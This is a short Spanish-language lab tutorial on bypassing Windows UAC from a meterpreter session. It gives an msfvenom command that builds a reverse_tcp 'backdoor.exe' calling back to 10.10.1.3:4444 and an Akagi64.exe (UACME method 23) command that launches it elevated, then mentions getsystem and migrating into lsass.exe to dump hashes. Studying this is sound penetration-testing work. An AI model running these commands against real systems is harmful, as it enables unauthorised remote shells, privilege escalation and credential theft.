UAC Bypass
Supongamos que estamos dentro de una sesión de meterpreter de una máquina Windows:

Y queremos ejecutar el comando getsystem, donde veremos que nos da error porque ha saltado el UAC:

Por tanto, el primer paso será generar el payload con msfvenom en formato .exe, para pasárselo a la herramienta que usaremos más tarde:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe'

Y ahora subimos este payload como también la herramienta para hacer el bypass llamada Akagi64.exe, ubicándonos en /temp porque allí tenemos permisos de escritura:


Una vez hecho esto, nos pondremos otra vez en escucha con metasploit para recibir esta nueva conexión:

Y ahora desde la otra sesión de meterpreter, ejecutamos el Akagi64.exe pasándole la backdoor.exe que hemos subido anteriormente:
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Recibimos la conexión y ahora sí podemos ejecutar el comando getsystem:

Y también podemos migrarnos al proceso lsass.exe para dumpear hashes:


